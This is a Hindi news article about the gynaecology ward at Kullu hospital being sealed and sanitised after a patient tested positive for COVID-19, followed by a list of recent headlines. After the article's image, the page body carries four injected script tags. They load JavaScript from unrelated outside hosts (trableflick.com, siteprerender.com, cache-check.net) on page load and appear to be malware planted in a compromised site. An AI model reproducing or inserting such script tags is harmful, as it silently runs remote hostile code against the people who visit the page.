Categories: हिमाचल

कुल्लूः अस्पताल में कोरोना पॉजिटिव आने के बाद गायनी वार्ड हुआ सील

<p>जिला कुल्लू का गायनी वार्ड कोरोना पॉजिटिव आने पर सील कर दिया गया है। वहीं, 45 मरीजों को दूसरे वार्ड में शिफ्ट कर दिया गया है। वार्ड में भर्ती मरीजों के पहले ही कोरोना टेस्ट लिए जा रहे हैं। बता दें कि कुल्लू अस्पताल के गायनी वार्ड में 31 अगस्त को एक महिला भर्ती की गई थी। उसी दौरान महिला की कोरोना टेस्ट लिए गए थे। बीती रात ही महिला की रिपोर्ट आई जिसमें महिला पॉजिटिव पाई गई।</p>

<p>वहीं, अस्पताल प्रबंधन ने तुरंत वार्ड को सील कर दिया और उसे पूरी तरह से सेनेटाइज कर दिया। मरीजों को भी दूसरे वार्ड में शिफ्ट कर दिया गया है। अस्पताल प्रबंधन के द्वारा अब गर्भवती महिलाओं की व्यवस्था तेगुबवेहड़ अस्पताल में की गई है और कुल्लू से भी मरीजों को वहां शिफ्ट किया गया है। अस्पताल की चिकित्सा अधीक्षक डॉ नीना लाल ने बताया कि पूरे वार्ड को सैनिटाइज किया गया है और यहां आने वाले हर मरीज के कोरोना के टेस्ट भी लिए जा रहे हैं। जिनमें अधिकतर महिलाओं के रिपोर्ट नेगेटिव पाई गई है। लेकिन आपातकाल स्थिति में आने वाले मरीजों को तुरंत यहां भर्ती किया जा रहा है और उनका इलाज भी किया जा रहा है।</p>

<p>डॉक्टर नीना लाल ने बताया कि कोरोना का केस आने पर अब वार्ड को 48 घंटे के लिए सील कर दिया गया है और पूरे वार्ड को सैनिटाइज करने के बाद ही इसे दोबारा खोला जाएगा। तब तक महिलाओं की व्यवस्था तेगुबेहड़ अस्पताल में की गई है। गौर रहे कि इससे पहले भी 14 अगस्त को करोना का मामला आने पर वार्ड को सील किया गया था और सैनिटाइज करने के बाद उसे कुछ दिनों के बाद दोबारा मरीजों के लिए खोल दिया गया था।</p>

<p><img src=”/media/gallery/images/image(6890).jpeg” style=”height:100px; width:802px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1599294747632″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

14 mins ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

1 hour ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

1 hour ago

मस्जिद विवाद के बीच विक्रमादित्य की वक्फ बोर्ड में सुधार की नस‍ीहत

Shimla:हिमाचल और हिमाचलियत के हित सर्वश्रेष्ठ, सर्वत्र हिमाचल का संपूर्ण विकास। समय के साथ हर…

2 hours ago

कंगना का मंडी प्रेम: ‘यह मेरा घर है, यहां काम करूंगी

Manali: मशहूर अभिनेत्री कंगना रनौत ने  मनाली की यात्रा के दौरान अपने गृहनगर और लोगों…

2 hours ago

Survey: लेनदेन शुल्क लगा तो UPIका इस्तेमाल बंद कर देगे 75% उपयोगकर्ता

  New Delhi:लोकलसर्किल्स ने रविवार को एक सर्वेक्षण निष्कर्ष निकाला है। जिसमें दावा किया गया…

6 hours ago